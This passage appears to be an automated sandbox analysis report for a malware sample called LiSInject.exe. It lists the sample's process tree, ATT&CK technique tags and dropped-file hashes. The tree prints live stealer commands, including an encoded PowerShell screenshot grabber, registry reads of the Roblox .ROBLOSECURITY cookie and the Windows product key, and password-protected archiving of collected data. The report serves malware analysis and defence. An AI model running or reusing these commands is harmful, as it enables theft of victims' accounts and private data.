uAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4800
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      PID:1184
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zfjf3avr\zfjf3avr.cmdline"
        5⤵
        
        PID:1532
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES132B.tmp" "c:\Users\Admin\AppData\Local\Temp\zfjf3avr\CSCD2DA48C372864654A04AE178F429D77.TMP"
        6⤵
        
        PID:1652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3060
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3416
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4868
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2316
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4848
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1732
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1272
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:5108
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI14562\rar.exe a -r -hp"teamgc" "C:\Users\Admin\AppData\Local\Temp\ia50w.zip" *"
    3⤵
    PID:3512
  - - C:\Users\Admin\AppData\Local\Temp\_MEI14562\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI14562\rar.exe a -r -hp"teamgc" "C:\Users\Admin\AppData\Local\Temp\ia50w.zip" *
      4⤵
      Executes dropped EXE
      PID:1172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:3044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4244
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2584
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1960
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2296
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:4004

C:\Users\Admin\Desktop\LiSInject\LiSInject.exe
"C:\Users\Admin\Desktop\LiSInject\LiSInject.exe"
1⤵
- Executes dropped EXE
PID:4232
- C:\Users\Admin\Desktop\LiSInject\LiSInject.exe
  "C:\Users\Admin\Desktop\LiSInject\LiSInject.exe"
  2⤵
  - Executes dropped EXE
  PID:4576

C:\Users\Admin\Desktop\LiSInject\LiSInject.exe
"C:\Users\Admin\Desktop\LiSInject\LiSInject.exe"
1⤵
- Executes dropped EXE
PID:3484
- C:\Users\Admin\Desktop\LiSInject\LiSInject.exe
  "C:\Users\Admin\Desktop\LiSInject\LiSInject.exe"
  2⤵
  - Executes dropped EXE
  PID:3472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\0I0iy2dgop.tmp

Filesize
114KB

MD5
9151f5327b2e0c5bbf2c2250b4ae413b

SHA1
9507d4adbbc09867323d6ccee16cb78477fdcbb7

SHA256
c9fa862d114e3c66b223992ad59303305df5a7c58d93b7b64baab504ba116980

SHA512
ccff4302b07e3573738d6bcb5128910a737e7352b303265b79ccd5bd43070bfc51be2734da1da5b48a06aed563559097edfec2fd0661339662c3bf058e18289c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zOC6B6CF87\LiSInject.exe

Filesize
8.3MB

MD5
684f8927bb39526b433751ee063e5a7e

SHA1
ed9f41d6cb7e8c5c7ef0276b20902c0493bdc1d3

SHA256
85f52dadb887bfcf3900d58b4a37c5f5cacabad2adc38db6776c8c75f8c78c97

SHA512
500d48685d58a43ed5c4489483600b3a53a02a787d1316ba9cd69d4cec5e234890c7c4b47d26c1d71d89e1d2f21020c14e796f2f41afb3ad4f30229eb2dee37f

Download Submit
C:\Users\Admin\AppData\Local\Temp\8taOqhM3Y4.tmp

Filesize
112KB

MD5
87210e9e528a4ddb09c6b671937c79c6

SHA1
3c75314714619f5b55e25769e0985d497f0062f2

SHA256
eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1

SHA512
f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\QJVwJIjUlv.tmp

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14562\_lzma.pyd

Filesize
86KB

MD5
e0fa126b354b796f9735e07e306573e1

SHA1
18901ce5f9a1f6b158f27c4a3e31e183aa83251b

SHA256
e0dc01233b16318cd21ca13570b8fdf4808657ec7d0cc3e7656b09ccf563dc3e

SHA512
dd38100889c55bffc6c4b882658ecd68a79257bc1ffd10f0f46e13e79bff3fc0f908ae885cc4a5fed035bd399860b923c90ef75e203b076b14069bf87610f138

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14562\_queue.pyd

Filesize
26KB

MD5
84aa87c6dd11a474be70149614976b89

SHA1
c31f98ec19fc36713d1d7d077ad4176db351f370

SHA256
6066df940d183cf218a5053100e474d1f96be0a4e4ee7c09b31ea303ff56e21b

SHA512
11b9f8e39c14c17788cc8f1fddd458d70b5f9ef50a3bdb0966548ddcb077ff1bf8ca338b02e45ec0b2e97a5edbe39481dd0e734119bc1708def559a0508adc42

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14562\_socket.pyd

Filesize
44KB

MD5
1d982f4d97ee5e5d4d89fe94b7841a43

SHA1
7f92fe214183a5c2a8979154ece86aad3c8120c6

SHA256
368cf569adc4b8d2c981274f22181fea6e7ce4fa09b3a5d883b0ff0ba825049d

SHA512
9ecdcf9b3e8dc7999d2fa8b3e3189f4b59ae3a088c4b92eaa79385ed412f3379ebe2f30245a95d158051dbd708a5c9941c150b9c3b480be7e1c2bba6dea5cb24

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14562\_sqlite3.pyd

Filesize
57KB

MD5
3911ae916c6e4bf99fe3296c3e5828ca

SHA1
87165cbf8ea18b94216ac2d1ffe46f22eddb0434

SHA256
3ec855c00585db0246b56f04d11615304931e03066cb9fc760ed598c34d85a1f

SHA512
5c30ed540fdfa199cdf56e73c9a13e9ac098f47244b076c70056fd4bf46f5b059cb4b9cdb0e03568ca9c93721622c793d6c659704af400bd3e20767d1893827e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14562\_ssl.pyd

Filesize
66KB

MD5
68e9eb3026fa037ee702016b7eb29e1b

SHA1
60c39dec3f9fb84b5255887a1d7610a245e8562e

SHA256
2ae5c1bdd1e691675bb028efd5185a4fa517ac46c9ef76af23c96344455ecc79

SHA512
50a919a9e728350005e83d5dd51ebca537afe5eb4739fee1f6a44a9309b137bb1f48581bafa490b2139cf6f035d80379bf6ffcdff7f4f1a1de930ba3f508c1af

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42682\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42682\_bz2.pyd

Filesize
48KB

MD5
1d9398c54c80c0ef2f00a67fc7c9a401

SHA1
858880173905e571c81a4a62a398923483f98e70

SHA256
89006952bee2b38d1b5c54cc055d8868d06c43e94cd9d9e0d00a716c5f3856fa

SHA512
806300d5820206e8f80639ccb1fba685aafa66a9528416102aeb28421e77784939285a88a67fad01b818f817a91382145322f993d855211f10e7ba3f5563a596

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42682\_ctypes.pyd

Filesize
59KB

MD5
2401460a376c597edce907f31ec67fbc

SHA1
7f723e755cb9bfeac79e3b49215dd41fdb5c2d90

SHA256
4f3f99b69834c43dac5c3f309cb0bd56c07e8c2ac555de4923fa2ddc27801960

SHA512
9e77d666c6b74cfb6287775333456cce43feb51ec39ad869c3350b1308e01ad9b9c476c8fa6251fe8ad4ab1175994902a4ad670493b95eb52adb3d4606c0b633

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42682\_decimal.pyd

Filesize
107KB

MD5
df361ea0c714b1a9d8cf9fcf6a907065

SHA1
102115ec2e550a8a8cad5949530cca9993250c76

SHA256
f78ee4524eb6e9885b9cbdb125b2f335864f51e9c36dc18fdccb5050926adffe

SHA512
b1259df9167f89f8df82bda1a21a26ee7eb4824b97791e7bbaa3e57b50ae60676762fd598c8576d4e6330ffaf12972a31db2f17b244c5301dcf29fe4abfba43f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42682\_hashlib.pyd

Filesize
35KB

MD5
d4c05f1c17ac3eb482b3d86399c9baae

SHA1
81b9a3dd8a5078c7696c90fbd4cf7e3762f479a5

SHA256
86bd72b13a47693e605a0de1112c9998d12e737644e7a101ac396d402e25cf2f

SHA512
f81379d81361365c63d45d56534c042d32ee52cad2c25607794fe90057dcdeeb2b3c1ff1d2162f9c1bdf72871f4da56e7c942b1c1ad829c89bf532fb3b04242e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42682\api-ms-win-core-console-l1-1-0.dll

Filesize
20KB

MD5
39852d24acf76cf0b3a427f46663efdf

SHA1
92b9730c276c6f2a46e583fc815374c823e6098b

SHA256
191e08dea0ad5ac02e7e84669d9fffa5aa67dc696e36077c5fa20d81c80b6a56

SHA512
e6f0898871b769244818d93117fe3cb82cc8f12bb24d6b3406ffcaa2a26f0b5754246b5c739e9cbcf07cb94aabba2fd934e7054607b4086b2f4c5592607e8385

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42682\api-ms-win-core-datetime-l1-1-0.dll

Filesize
20KB

MD5
b71c18f8966cead654800ff402c6520f

SHA1
a6f658ea85ad754cf571f7b67f3360d5417f94bd

SHA256
a94b80a5111aabefb1309609abdd300bb626d861cd8e0938b9735ab711a43c22

SHA512
17867aaa57542c1cd989ca3000f3d93bbb959eb5a69100c70c694bde10db8f8422d3e86e1a5fc0848677e4343c424013cdf496b8bb685f8875c3330271242369

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42682\api-ms-win-core-debug-l1-1-0.dll

Filesize
20KB

MD5
a998282826d6091984d7d5f0bf476a31

SHA1
b958281ad7b861e0adcbeb0033932057082ae4fc

SHA256
263e038363527b7bed05110f37f7e5b95f82aab9c0280c9c522cf7bfce10fd7d

SHA512
ba46b6e7649cded62e9c097c29d42a8ea3da52109d285b8ed7aaea9a93c203efcfd856d25cee9bd825c0835b37a1d7a37a8ae55e0e10dc237f0da7013056cf5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42682\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
20KB

MD5
c148a26d3d9d39777dabe28dc08cee60

SHA1
4f7537ba8cee5ff774f8d7c3fe4174fc512b70d4

SHA256
085968d938ea924827c4740697713674850218a8fe91dd9982e93b0effacc820

SHA512
6689dfb19898f420632295fb9982668919011784278dc6840716c91ca8dcb434057096640a15fab7a93edf722530451da274d02bb344cd429388412ad11a79e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42682\api-ms-win-core-fibers-l1-1-0.dll

Filesize
20KB

MD5
ee3f0d24e7e32e661ac407c60b84b7db

SHA1
09107fb9ace59a1ac3a8b8dbb4ff00b91182929b

SHA256
c86ebc9f48e2db659e80d9c7ad5f29e6b6c850eea58813c041baeff496ae4f18

SHA512
c3fbba7fad4fe03a3a763ad86681655f1bb04d6dd9f64c0083aaa0262ce18f82970365532337825d44ec92b3d79b3212817b25f188537a3771807ad17e7f8d05

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42682\api-ms-win-core-file-l1-1-0.dll

Filesize
24KB

MD5
e933cdd91fd5725873f57532f262f815

SHA1
e48f6f301a03beb5e57a0727a09e7c28a68e19f3

SHA256
120c3afed9ce2a981c61208757fca0665f43926751ec8d0d13e10ef1096a0d48

SHA512
d1c598f964a98a30c6a4926f6b19f8213884224861c36aba839f5a91acefaa8c0e8b3d7cd555103885520432a343b489044e4ad3a1c33d77cf3fda4493eb48fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42682\api-ms-win-core-file-l1-2-0.dll

Filesize
20KB

MD5
b59d773b0848785a76baba82d3f775fa

SHA1
1b8dcd7f0e2ab0ba9ba302aa4e9c4bfa8da74a82

SHA256
0dc1f695befddb8ee52a308801410f2f1d115fc70668131075c2dbcfa0b6f9a0

SHA512
cbd52ed8a7471187d74367aa03bf097d9eac3e0d6dc64baf835744a09da0b050537ea6092dcb8b1e0365427e7f27315be2145c6f853ef936755ad07ef17d4a26

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42682\api-ms-win-core-file-l2-1-0.dll

Filesize
20KB

MD5
4c9bf992ae40c7460a029b1046a7fb5e

SHA1
79e13947af1d603c964cce3b225306cadff4058b

SHA256
18655793b4d489f769327e3c8710aced6b763c7873b6a8dc5ae6f28d228647f4

SHA512
c36d455ac79a73758f6090977c204764a88e929e8eaa7ce27a9c9920451c014e84ae98beb447e8345a8fa186b8c668b076c0ed27047a0e23ad2eeaf2cbc3a8d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42682\api-ms-win-core-handle-l1-1-0.dll

Filesize
20KB

MD5
f90e3b45c7942e3e30ecf1505253b289

SHA1
83beec2358de70268bc2e26ed0a1290aaef93f94

SHA256
7e45a1b997331f4d038f847f205904d6ec703df7a8c5c660435697e318ced8fc

SHA512
676450eb70a5ceae1820a978412ef3df746f14790322122b2de3e18ef013802c27867ad315950fc9b711e66f36628b062e57a7ec44d1ddc06f443655383cdc14

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42682\api-ms-win-core-heap-l1-1-0.dll

Filesize
20KB

MD5
f2c267153db0182cca23038fc1cbf16a

SHA1
10d701ab952cacbf802615b0b458bc4d1a629042

SHA256
dd1e8c77002685629c5cd569ee17f9aa2bcb2e59d41b76ae5bc751cae26d75bf

SHA512
84f3c587be5a91752eeffd4f8e5ded74877930515fd9f4d48021b0f22a32feb3a4ddb9a0f14748e817f8c648bd307942ec026fc67eea922247499b5f412b4914

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42682\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
20KB

MD5
5f2e21c4f0be6a9e15c8ddc2ecdd7089

SHA1
1282b65a9b7276679366fe88c55fab442c0cc3a1

SHA256
ea60d03a35ef2c50306dbbd1ad408c714b1548035c615359af5a7ce8c0bd14a8

SHA512
a32c5ed72d4bfda60b2259e5982e42a79040225a4877246f3a645e05bfb8be395555fa22b2f0ed884f5fd82a8021bba85637727544c9adbb3a8c97b80e7a30f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42682\api-ms-win-core-libraryloader-l1-1-0.dll

Filesize
20KB

MD5
7b828554daa24f54275b81dfa54e0c62

SHA1
03fa109c21c0dc2e847117de133a68c6cd891555

SHA256
929298566ba01d1c3e64356a1f8370c1e97f0599f56f823c508cde9ae17f130b

SHA512
